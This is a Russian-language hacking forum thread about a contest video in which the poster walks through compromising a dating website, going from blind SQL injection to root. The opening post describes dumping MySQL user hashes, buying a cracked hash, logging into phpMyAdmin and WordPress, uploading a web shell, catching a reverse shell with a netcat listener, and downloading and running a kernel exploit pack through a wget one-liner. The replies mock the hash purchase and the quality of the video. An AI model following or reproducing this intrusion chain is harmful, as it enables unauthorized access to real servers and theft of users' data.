http://www.youtube.com/watch?v=RjoQ-0icTwE Видео на конкурс Датинг миллионик. Видео показывает как можно дойти от sql injection до рута. Наша уязвимость находится в пост запросе, проблема уязвимости в том, что она не выводит никакие буквы, при выводе буквы - вылетает ошибка и пишется лог. Это можно назвать блайнд скулью, но тут нам будет немного проще, можно сразу выводить цифру, без подбора ascii(substring(name,1,1)). После того как получили доступ от mysql.user( user,password ), быстро набрутил доступ в phpMyAdmin, и залогинился под рутом. P.S. Хеш брутился около недели, и тут где-то даже топы есть где я купил его за 200$ Потом находим сразу блог на датинге, вп, и смотрим пасс в таблице wp_users, при заходе в админку, можно увидеть как уже некоторые личности пытались поломать датинг, но примитивно и безуспешно. Далее заливаем шелл, и заливаем backconnect. Открываем порт на нашем серве, nc -l 8084 и делаем бекконнект на наш сервер. Для быстрого рута, я заюзал очень удобную утилиту Code: cd /tmp;wget http://www.grsecurity.net/~spender/enlightenment.tgz;tar -zxf enlightenment.tgz;rm -rf enlightenment.tgz;cd enlightenment;ls -la потом выполняем скомпиленый товар ./run_null_exploits, юзаем 5ый сплойт - и.... рут Всем спасибо!
Хочется отметить, что многовато понтов за словами 200$ и миллиоННик. Тебе ведь сбрутили хеш на другом форуме и спорю что бесплатно. У сайта PageRank 3, 400 стр в индексе, alexa rank ~145 000 и это и подтверждает его низкую популярность и посещаемость. И сам это понимаешь иначе зачем делать видео впопыхах и так сорить хешами на форумах. А ты даже не показал а чего там в базах и сколько. И зачем было показывать свою ламарезность и покупать пасс 123098 ? Можно было не позорится, а в видео похэкать хеши в той же PasswordsPro заганя их заранее в словарь, а пассы и хеши частично затереть. Или это новая эра хэкеров, которые еще и в минус работают: покупают пассы по 6000 руб.; покупают элементарные хеши , которые находятся за 0,00001 сек.
Как ты его жестко. Не пожалел... Ну с горяча он хешем так поступил. Что понятно. Адриналин... ps Мне понравилось.
Пост претендующий на звание "кэп года" Гы какие ж эта хацкеры,если не смогли порутать сервант,когда это сделал один из самых популярных сплоитпаков,чтож они там юзали за сплоенты?Или бэк не сделали А по видео скажу,что хорошая работа впринципе,только оформление не оч гут,но это не столь важно.На будущее,не заставляй юзернеймов смотреть,как ты там набираешь текст в блокнотике,это многих бесит.
Ну не скажи меня наоборот бесит когда текст появляется на одну секунду и нужно останавливать запись. А видео интересное )
Хм. во 1х пароль брутился от пхпмайадмина а по поводу хэшам можешь спросить у чела с ником Internet(с этого форума), количество записей четко видно в видео. К чему срач?
Какой еще internet тоесть мистер сомрад не причастен к твоим хешам и 200$ ? Да ежу понятно откуда хеш. НЕ записей внутри, а полей может там шлак в бд
Тут он заказывал хеши. Comrad777 - сбрутил хеш, в ICQ его ник internet, поэтому ТС так и назвал его..
В видео нету подробностей Как переведены цифры в root:hash. Как зашел в pma. В чем уникальность полей бд (креды; пассы что?) Залить шелл и зайти в wp можно и без расшифровки хеша.А ведь это роль видео быть подробней чем статья тут все наоборот написать можно лучше чем показать. Видео получше были тут 5-7 лет назад не понимаю щенячьего душещипательного восторга. Хотя это показывает уровень знаний отписавщихся.
Хм, чем же я тебе насолил. ПО поводу заливки шелла, если ты хотя-бы читал мои ответы, то увидел что я не нашел ПУТЕЙ, поэтому через пхпмайадмин я не мог залить шелл.
